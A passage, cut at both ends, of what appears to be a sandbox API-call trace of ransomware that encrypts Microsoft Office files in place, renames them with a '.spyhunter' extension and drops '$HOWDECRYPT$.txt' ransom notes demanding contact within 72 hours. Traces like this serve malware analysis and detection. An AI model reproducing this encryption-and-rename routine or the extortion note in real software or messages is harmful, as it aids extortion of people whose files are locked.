pdwDataLen=0x57fb58*=0x30) returned 1 [0100.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0100.314] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml") returned 79 [0100.314] StrStrW (lpFirst="Urban.xml", lpSrch=".txt") returned 0x0 [0100.314] GetProcessHeap () returned 0x2c0000 [0100.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0100.314] ReadFile (in: hFile=0xf0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fb1c*=0x3c0, lpOverlapped=0x0) returned 1 [0100.374] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffc40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.374] WriteFile (in: hFile=0xf0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x57fb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fb1c*=0x3c0, lpOverlapped=0x0) returned 1 [0100.375] GetProcessHeap () returned 0x2c0000 [0100.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0100.375] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.375] WriteFile (in: hFile=0xf0, lpBuffer=0x57fb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb1c, lpOverlapped=0x0 | out: lpBuffer=0x57fb5c*, lpNumberOfBytesWritten=0x57fb1c*=0x4, lpOverlapped=0x0) returned 1 [0100.375] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb1c*=0x30, lpOverlapped=0x0) returned 1 [0100.375] CloseHandle (hObject=0xf0) returned 1 [0100.375] GetProcessHeap () returned 0x2c0000 [0100.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0100.378] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml.spyhunter") returned 89 [0100.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml.spyhunter")) returned 1 [0100.379] GetProcessHeap () returned 0x2c0000 [0100.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0100.379] GetProcessHeap () returned 0x2c0000 [0100.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0100.379] GetProcessHeap () returned 0x2c0000 [0100.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377f08 | out: hHeap=0x2c0000) returned 1 [0100.383] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb60 | out: pbBuffer=0x57fb60) returned 1 [0100.383] GetProcessHeap () returned 0x2c0000 [0100.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0100.383] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb58*=0x30) returned 1 [0100.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0100.383] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml") returned 80 [0100.383] StrStrW (lpFirst="Thatch.xml", lpSrch=".txt") returned 0x0 [0100.383] GetProcessHeap () returned 0x2c0000 [0100.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0100.383] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb1c*=0x3c1, lpOverlapped=0x0) returned 1 [0100.412] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffc3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.412] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x3c1, lpNumberOfBytesWritten=0x57fb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb1c*=0x3c1, lpOverlapped=0x0) returned 1 [0100.540] GetProcessHeap () returned 0x2c0000 [0100.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0100.540] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.540] WriteFile (in: hFile=0xf0, lpBuffer=0x57fb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb1c, lpOverlapped=0x0 | out: lpBuffer=0x57fb5c*, lpNumberOfBytesWritten=0x57fb1c*=0x4, lpOverlapped=0x0) returned 1 [0100.541] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb1c*=0x30, lpOverlapped=0x0) returned 1 [0100.541] CloseHandle (hObject=0xf0) returned 1 [0100.541] GetProcessHeap () returned 0x2c0000 [0100.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0100.541] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml.spyhunter") returned 90 [0100.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml.spyhunter")) returned 1 [0100.609] GetProcessHeap () returned 0x2c0000 [0100.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0100.609] GetProcessHeap () returned 0x2c0000 [0100.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0100.609] GetProcessHeap () returned 0x2c0000 [0100.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x356b90 | out: hHeap=0x2c0000) returned 1 [0100.609] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb58 | out: pbBuffer=0x57fb58) returned 1 [0100.609] GetProcessHeap () returned 0x2c0000 [0100.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0100.609] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb50*=0x30) returned 1 [0100.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\urban.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0100.613] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx") returned 67 [0100.613] StrStrW (lpFirst="Urban.thmx", lpSrch=".txt") returned 0x0 [0100.613] GetProcessHeap () returned 0x2c0000 [0100.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0100.613] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fb14*=0x2800, lpOverlapped=0x0) returned 1 [0100.615] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.615] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fb14*=0x2800, lpOverlapped=0x0) returned 1 [0100.615] GetProcessHeap () returned 0x2c0000 [0100.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0100.615] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.615] WriteFile (in: hFile=0xec, lpBuffer=0x57fb54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb14, lpOverlapped=0x0 | out: lpBuffer=0x57fb54*, lpNumberOfBytesWritten=0x57fb14*=0x4, lpOverlapped=0x0) returned 1 [0100.615] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb14*=0x30, lpOverlapped=0x0) returned 1 [0100.616] CloseHandle (hObject=0xec) returned 1 [0100.616] GetProcessHeap () returned 0x2c0000 [0100.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0100.616] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx.spyhunter") returned 77 [0100.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\urban.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\urban.thmx.spyhunter")) returned 1 [0100.619] GetProcessHeap () returned 0x2c0000 [0100.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0100.619] GetProcessHeap () returned 0x2c0000 [0100.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0100.619] GetProcessHeap () returned 0x2c0000 [0100.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ee40 | out: hHeap=0x2c0000) returned 1 [0100.620] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0100.621] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0100.621] WriteFile (in: hFile=0xec, lpBuffer=0x57fa8b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fbb4, lpOverlapped=0x0 | out: lpBuffer=0x57fa8b*, lpNumberOfBytesWritten=0x57fbb4*=0x127, lpOverlapped=0x0) returned 1 [0100.621] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0100.621] WriteFile (in: hFile=0xec, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fbb4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fbb4*=0x2ac, lpOverlapped=0x0) returned 1 [0100.622] CloseHandle (hObject=0xec) returned 1 [0100.622] GetProcessHeap () returned 0x2c0000 [0100.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c25378 | out: hHeap=0x2c0000) returned 1 [0100.622] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb50 | out: pbBuffer=0x57fb50) returned 1 [0100.622] GetProcessHeap () returned 0x2c0000 [0100.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0100.622] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb48*=0x30) returned 1 [0100.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.632] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml") returned 81 [0100.632] StrStrW (lpFirst="Waveform.xml", lpSrch=".txt") returned 0x0 [0100.632] GetProcessHeap () returned 0x2c0000 [0100.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0100.632] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fb0c*=0xdf9, lpOverlapped=0x0) returned 1 [0100.657] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff207, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.657] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xdf9, lpNumberOfBytesWritten=0x57fb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fb0c*=0xdf9, lpOverlapped=0x0) returned 1 [0100.657] GetProcessHeap () returned 0x2c0000 [0100.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0100.657] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.657] WriteFile (in: hFile=0x16c, lpBuffer=0x57fb4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb0c, lpOverlapped=0x0 | out: lpBuffer=0x57fb4c*, lpNumberOfBytesWritten=0x57fb0c*=0x4, lpOverlapped=0x0) returned 1 [0100.657] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb0c*=0x30, lpOverlapped=0x0) returned 1 [0100.657] CloseHandle (hObject=0x16c) returned 1 [0100.658] GetProcessHeap () returned 0x2c0000 [0100.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.658] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml.spyhunter") returned 91 [0100.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml.spyhunter")) returned 1 [0100.658] GetProcessHeap () returned 0x2c0000 [0100.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.658] GetProcessHeap () returned 0x2c0000 [0100.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0100.658] GetProcessHeap () returned 0x2c0000 [0100.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39a670 | out: hHeap=0x2c0000) returned 1 [0100.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.659] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0100.659] WriteFile (in: hFile=0x16c, lpBuffer=0x57fa83*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fbac, lpOverlapped=0x0 | out: lpBuffer=0x57fa83*, lpNumberOfBytesWritten=0x57fbac*=0x127, lpOverlapped=0x0) returned 1 [0100.660] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0100.660] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fbac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fbac*=0x2ac, lpOverlapped=0x0) returned 1 [0100.660] CloseHandle (hObject=0x16c) returned 1 [0100.660] GetProcessHeap () returned 0x2c0000 [0100.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c16a58 | out: hHeap=0x2c0000) returned 1 [0100.660] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb48 | out: pbBuffer=0x57fb48) returned 1 [0100.660] GetProcessHeap () returned 0x2c0000 [0100.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0100.660] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb40*=0x30) returned 1 [0100.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0336075.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.660] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF") returned 65 [0100.661] StrStrW (lpFirst="J0336075.WMF", lpSrch=".txt") returned 0x0 [0100.661] GetProcessHeap () returned 0x2c0000 [0100.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0100.661] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fb04*=0x2800, lpOverlapped=0x0) returned 1 [0100.685] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.685] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fb04*=0x2800, lpOverlapped=0x0) returned 1 [0100.685] GetProcessHeap () returned 0x2c0000 [0100.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0100.685] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.685] WriteFile (in: hFile=0x16c, lpBuffer=0x57fb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb04, lpOverlapped=0x0 | out: lpBuffer=0x57fb44*, lpNumberOfBytesWritten=0x57fb04*=0x4, lpOverlapped=0x0) returned 1 [0100.725] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb04*=0x30, lpOverlapped=0x0) returned 1 [0100.726] CloseHandle (hObject=0x16c) returned 1 [0100.726] GetProcessHeap () returned 0x2c0000 [0100.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.726] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF.spyhunter") returned 75 [0100.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0336075.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0336075.wmf.spyhunter")) returned 1 [0100.727] GetProcessHeap () returned 0x2c0000 [0100.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.728] GetProcessHeap () returned 0x2c0000 [0100.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0100.728] GetProcessHeap () returned 0x2c0000 [0100.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c95230 | out: hHeap=0x2c0000) returned 1 [0100.728] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb48 | out: pbBuffer=0x57fb48) returned 1 [0100.728] GetProcessHeap () returned 0x2c0000 [0100.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0100.728] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb40*=0x30) returned 1 [0100.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0100.736] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF") returned 74 [0100.736] StrStrW (lpFirst="BD18256_.WMF", lpSrch=".txt") returned 0x0 [0100.736] GetProcessHeap () returned 0x2c0000 [0100.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0100.736] ReadFile (in: hFile=0xf0, 